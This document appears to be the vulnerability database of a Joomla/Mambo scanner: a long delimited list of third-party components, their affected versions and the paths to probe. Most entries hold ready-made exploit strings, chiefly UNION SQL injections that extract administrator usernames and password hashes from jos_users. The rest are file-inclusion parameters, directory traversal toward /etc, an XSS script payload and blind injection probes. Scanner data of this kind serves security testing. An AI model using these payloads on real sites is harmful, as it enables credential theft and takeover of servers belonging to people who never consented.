htaccess.txt has not been renamed. Versions effected: Any|/htaccess.txt|Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed. Unprotected Administrator directory Versions Affected: Any|/administrator|The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf Guessable Administrator directory Versions Affected: Any|/admin|The guessable /admin directory is detected. Attackers can bruteforce administrator accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf be2004-2 a Joomla Template File Inclusion Vulnerability Versions effected: 2 and lower|/templates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path= AutoStand Category File Inclusion Vulnerability Versions effected: 1.0 and lower|/modules/mod_as_category.php|/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path= A6MamboCredits File Inclusion Vulnerability Versions effected: Any|/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= Quick Question module Versions effected: 4.5.1 and older|/modules/mod_quick_question.php|N/A Advanced Poll Versions effected: 2.2.0 and older|/components/com_advancedpoll/|N/A Akocomment Versions effected: Any Version|/components/com_akocomment/|N/A Article File Inclusion Vulnerability Versions effected: 1.1 and older|/components/com_articles/|/components/com_articles/com_articles.php?absolute_path= ArtLinks File Inclusion Vulnerability Versions effected: Any|/components/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= MamCom (?) Versions effected: Any Version|/components/com_trade/|N/A AutoStand Versions effected: 1.1 and older|/components/com_autostand/|N/A Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/components/com_bayesiannaivefilter/|/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= BigApe Backup File Inclusion Vulnerability Versions effected: Any Version|/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_absolute_path= BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions effected: 2.2.1 and older|/components/com_bsqsitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled. Car Manager SQL Injection Vulerability Versions effected: 1.1 and older|/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Classifieds Versions effected: 1.3 and older|/components/com_classifieds/|N/A Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= Community Builder SQL Injection Vulerability Versions effected: 1.0.0 and older|/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Events Versions effected: 1.3 Beta and older|/components/com_events/|N/A Expose Flash Gallery Versions effected: RC4 and older|/components/com_expose/|N/A ExtCalendar XSS Vulnerability Versions effected: 0.9.1 and older|/components/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "next" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in). Facile Forms Versions effected: 1.4.6 and older|/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Galleria File Inclusion Vulnerability Versions effected: Any Version|/components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html.php?mosConfig_absolute_path= Gmaps SQL Injection Vulnerability Versions effected: 1.01 and older|/components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Hash Cash File Inclusion Vulnerability Versions effected: Any Version|/components/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_absolute_path= Hot Property Versions effected: 0.97 and older|/components/com_hotproperty/|N/A JCE XSS+File Inclusion Vulnerability Versions effected: 1.0.4 and older|/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/components/com_jpack/|/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= JoomlaBoard File Inclusion Vulnerability Versions effected: 1.1.1 and older|/components/com_joomlaboard/|/components/com_joomlaboard/file_upload.php?sbp= JoomlaLib Versions effected: 1.2.1 and older|/components/com_joomlalib/|N/A JD-WordPress Versions effected: 1.0 RC2 and older|/components/com_jd-wp/|N/A Fundraiser Versions effected: 0.0.0 and older|/components/com_fundraiser/|N/A Marketplace SQL Injection Vulnerability Versions effected: 1.1.1-pl1 and older|/components/com_marketplace/|/index.php?option=com_marketplace&page=show_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- NeoReferences SQL Injection Vulnerability Versions effected: 1.3.1 and older|/components/com_neoreferences/|/index.php?option=com_neoreferences&Itemid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+where+user_id=1=1-- CHRONOContact File Inclusion Vulnerability Versions effected: N/A|/components/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path= MamboSPGM Versions effected: 1.4.1 and older|/components/com_mambospgm/|N/A Ajax Chat Versions effected: 1.0.1 and older|/components/com_ajaxchat/|N/A Joomla Cloner Versions effected: 1.6.1 and older|/components/com_cloner/|N/A Quiz SQL Injection Vulnerability Versions effected: 0.81 and older|/components/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- MCQuiz SQL Injection Vulnerability Versions effected: 0.9 and older|/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- paxxgallery Blind SQL Injection Versions effected: 0.2 and older|/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=-3333+and+substring(@@version,1,1)=5::/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333+and+substring(@@version,1,1)=6 pcchess File Inclusion Vulnerability Versions effected: 0.8 and older|/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path= xfaq SQL Injection Vulnerability Versions effected: 1.2 and older|/components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- rapidrecipe Remote SQL injection Versions effected: 1.6.5 and older|/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_doc SQL Injection Vulnerability Versions effected: Any Version|/components/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,username,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Unknown name: com_noticias SQL Injection Vulnerability Versions effected: Any Version|/components/com_noticias/|index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password,0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- NeoGallery SQL Injection Vulnerability Versions effected: Any Version|/components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5&catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Ynews SQL Injection Vulnerability Versions effected: 1.0.0 and older|/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- jooget SQL Injection Vulnerability Versions effected: 2.6.8 and older|/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail&id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- MediaSlide Versions effected: 0.5.0 and older|/components/com_mediaslide/|Compare the content length of /index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1 and /index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0 Rssxt Versions effected: 1.0 and older|/components/com_rssxt/|N/A D4JeZine Versions effected: 2.8 and older|/components/com_ezine/|N/A ProductShowcase SQL Injection Versions effected: 1.5 and older|/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Candle SQL Injection Versions effected: 1.0.0 and older|/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- simple shop SQL Injection Versions effected: 2.0 and older|/components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- hwdVideoShare SQL Injection Versions effected: 1.1.1 and older|/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Clasifier SQL Injection Versions effected: 0.9 and older|/components/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- PC CookBook SQL Injection Vulnerability Versions effected: 1.3 and older|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- astatsPRO SQL Injection Vulnerability Versions effected: 1.0.0 and older|/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_galeria SQL Injection Vulnerability Versions effected: Any Version|/components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=-999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Limbo File Manager Component Versions effected: 1.0.4 and older|/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_absolute_path= Serverstat File Inclusion Vulnerability Versions effected: 0.4.4 and older|/components/com_serverstat/install.serverstat.php|/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= Com Profiler Blind SQL Injection Versions effected: 1.0 RC2 and older|/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6 Crop Image File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admin.cropcanvas.php?cropimagedir= Mambatstaff File Inclusion Vulnerability Versions effected: 3.1b and older|/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= Loudmouth Versions effected: 4.0j and older|/components/com_loudmouth/|N/A PhpBB Comonent Versions effected: 1.2.4RC3 and older|/components/com_forum/|/components/com_forum/download.php?phpbb_root_path= Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/components/com_kochsuite /|/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= Remository File Inclusion Vulnerability Versions effected: 3.25 and older|/components/com_remository/admin.remository.php|/components/com_remository/admin.remository.php?mosConfig_absolute_path= Tosmo Mambo Versions effected: 4.0.13a and older|/components/com_minibb/|/components/minibb/index.php?absolute_path= Mam - Moodle File Inclusion Vulnerability Versions effected: Any Version|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosConfig_absolute_path= Coppermine Photo Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosConfig_absolute_path= Php Shop File Inclusion Vulnerability Versions effected: 1.2 RC2b and older|/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= MamboWiki File Inclusion Vulnerability Versions effected: 0.9.6 and older|/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLogin.php?IP= Lurm Constructor File Inclusion Vulnerability Versions effected: 0.6b and older|/components/com_lurm_constructor/admin.lurm_constructor.php|/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= FlippingBook SQL Injection Versions effected: 1.0.4 and older|/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book_id=null+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- eXtplorer Local Directory Traversal Versions effected: 2.0.0 RC2 and older|/components/com_extplorer/|/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed joomlaXplorer Local Directory Traversal Versions effected: 1.6.2 and older|/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc joomlaXplorer XSS Versions effected: 1.6.2 and older|/components/com_joomlaxplorer|/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Online FlashQuiz Remote File Inclusion Versions effected: 1.0.2 and older|/components/com_onlineflashquiz/|/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir= actualite SQL Injection Versions effected: 1.0 and older|/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- myalbum SQL Injection Versions effected: 1.0 and older|/components/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- alphacontent SQL Injection Versions effected: 2.5.8 and older|/components/com_alphacontent/|/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Cinema SQL Injection Versions effected: 1.0 and older|/components/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+UNION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- D3000 SQL Injection Versions effected: 1.0.0 and older|/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999+UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- rekry SQL Injection Versions effected: 1.0.0 and older|/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+limit+1,1-- custompages Remote File Inclusion Versions effected: 1.1 and older|/components/com_custompages/|/index.php?option=com_custompages&cpage= Restaurante File Upload Vulnerability Versions effected: 1.0 and older|/components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Alberghi SQL Injection Versions effected: 2.1.3 and older|/components/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- joovideo SQL Injection Versions effected: 1.2.2 and older|/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Acajoom SQL Injection Vulnerability Versions effected: 1.1.5 and older|/components/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1-- jReviews Versions effected: Any Version|/components/com_jreviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path= BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions effected: 1.8.0 and older|/components/com_bsq_sitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled. Madeira Versions effected: Any Version|/components/com_madeira/img.php|/components/com_madeira/img.php?url= Mambo eMail Publisher File Inclusion Vulnerability Versions effected: 1.2 and older|/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp.php?mosConfig_absolute_path= Extended Registration File Inclusion Vulnerability Versions effected: 4.1 and older|/components/com_extended_registration/registration_detailed.inc.php|/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= OpenSEF Versions effected: 2.0.0 RC5 Unpatched and older [OR] joomSEF (ARTIO) Versions effected: 2.2.1 and older [OR] sh404SEF Versions effected: 1.2.4 w and older|/components/com_sef/|N/A Multibanners File Inclusion Vulnerability Versions effected: Any Version|/components/com_multibanners/extadminmenus.class.php|/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= MoSpray File Inclusion Vulnerability Versions effected: 1.8 RC1 and older|/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts/admin.php?basedir= MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_absolute_path= Mos Tree File Inclusion Vulnerability Versions effected: 1.58 and older|/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_absolute_path= MambelFish File Inclusion Vulnerability Versions effected: 1.x and older|/components/com_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= LMO File Inclusion Vulnerability Versions effected: 1.0b2 and older|/components/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path= Link Directory File Inclusion Vulnerability Versions effected: Any Version|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Letterman Versions effected: 1.2.4 and older|/components/mod_letterman/|N/A JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older|/components/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path= JD-Wiki File Inclusion Vulnerability Versions effected: Any Version|/components/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path= Joomla Visites Remote File Inclusion Vulnerability Versions effected: 1.1 RC2 and older|/components/com_joomla-visites/|/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path= JPad SQL Injection Vulnerability Versions effected: 1.0 and older|/components/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Filiale Versions SQL Injection effected: 1.0.4 and older|/components/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Pony Gallery SQL Injection Vulnerability Versions effected: 1.5 and older|/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Flash Slide Show Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_slideshow/|/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site= zOOm Media Gallery File Inclusion Vulnerability Versions effected: 2.5.1 RC4 and older|/components/com_zoom/classes/|/components/com_zoom/classes/database.php?mosConfig_absolute_path= VirtueMart Versions effected: 1.0.11 and older|/components/com_virtuemart/|N/A User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_absolute_path= User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_absolute_path= TaskHopper File Inclusion Vulnerability Versions effected: 1.1 and older|/components/com_thopper/|/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= Security Images File Inclusion Vulnerability Versions effected: 3.0.5 and older|/components/com_securityimages/|/components/com_securityimages/lang.php?mosConfig_absolute_path= Site Map File Inclusion Vulnerability Versions effected: Any Version|/components/com_sitemap/|/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= SimpleBoard Script Insertion File Inclusion Vulnerability Versions effected: Any Version|/components/com_simpleboard/|/components/com_simpleboard/file_upload.php?sbp= SMF Bridge File Inclusion Vulnerability Versions effected: 1.1.4 and older|/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_path= RWCards SQL Injection Vulnerability Versions effected: 2.4.4 and older|/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&category_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- RS Gallery2 SQL Injection Vulnerability Versions effected: 1.11.3 and older|/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- PollXT File Inclusion Vulnerability Versions effected: 1.22.07 and older|/components/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path= Phil-A-Form Versions effected: 1.2 and older|/components/com_philaform/|N/A Per Forms File Inclusion Vulnerability Versions effected: v1_beta and older|/components/com_performs/|/components/com_performs/performs.php?mosConfig_absolute_path Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_wmtgallery/|/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= Flash Panoramic View File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_panoramic/|/components/com_panoramic/admin.panoramic.php?mosConfig_live_site= MamboXChange VideoDB File Inclusion Vulnerability Versions effected: 0.3en and older|/components/com_videodb/core/videodb.class.xml.php|/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions effected: 1.5 and older|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path= Calendar Versions effected: 1.5.7 and older|/components/com_calendar/|N/A NFN Address Book Versions effected: 0.4 and older|/components/com_nfn_addressbook/|N/A X-Shop Versions effected: 1.7 and older|/components/com_x-shop/|N/A Tour de France Pool Versions effected: 1.0.1 and older|/components/com_tour_toto/|N/A SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= Nice Talk SQL Injection Vulnerability Versions effected: 0.9.3 and older|/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+SELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- BibTeX Versions effected: 1.3 and older|/components/com_jombib/|N/A RSfiles Versions effected: 1.0.2 and older|/components/com_rsfiles/|N/A J! Reactions Versions effected: 1.8.1 and older|/components/com_jreactions/|N/A 